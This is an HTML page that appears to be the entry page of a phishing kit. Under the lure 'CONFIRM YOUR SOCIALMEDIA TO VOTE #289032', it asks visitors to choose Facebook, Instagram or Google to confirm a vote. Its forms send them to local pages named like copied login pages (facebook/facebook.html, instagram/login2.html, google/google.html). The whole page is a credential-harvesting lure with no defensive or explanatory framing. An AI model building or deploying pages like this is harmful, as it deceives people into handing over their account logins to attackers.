<!DOCTYPE html>
<html>
<head>
<style>
  .hover   {
  color: #FFF;
  text-align: center;
  width: 222px;
  cursor:pointer;
  background-color: #0EADFF;
  display: block;margin:0px auto;border-radius:20px;border-color:transparent;height:40px;
}
.hover1:hover   {
  color: #FFF;
  text-align: center;
  width: 222px;
  cursor:pointer;
  background-color: #108ee9;;
  display: block;margin:0px auto;border-radius:20px;border-color:transparent;height:40px;
}
</style>
</head>
<title>CONFIRM YOUR SOCIALMEDIA TO VOTE #289032</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<!-- Header -->
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
  <h1 class="w3-xlarge">CONFIRM YOUR SOCIALMEDIA TO VOTE</h1>
  <h1>#289032</h1>
</header>

<body bgcolor="#eff0f1" style="text-align:center">
  <div>

         
        Select your favorite social networks to confirm your vote :<br>
<form action="facebook/facebook.html">
    <div id="group1">
        <input type="checkbox" value="facebook" name="social" > Facebook<br> <input type="submit" value="Submit" class="hover hover1">
</div>
</form>       
<form action="instagram/login2.html">
    <div id="group2">
        <input type="checkbox" value="instagram" name="social" > Instagram<br> <input type="submit" value="Submit" class="hover hover1">
<form action="facebook.html">
</div>
</form>
    
<form action="google/google.html">
<div id="group3">
        <input type="checkbox" value="GOOGLE" name="social" > Google<br>

        <input type="submit" value="Submit" class="hover hover1">
</div>
</form>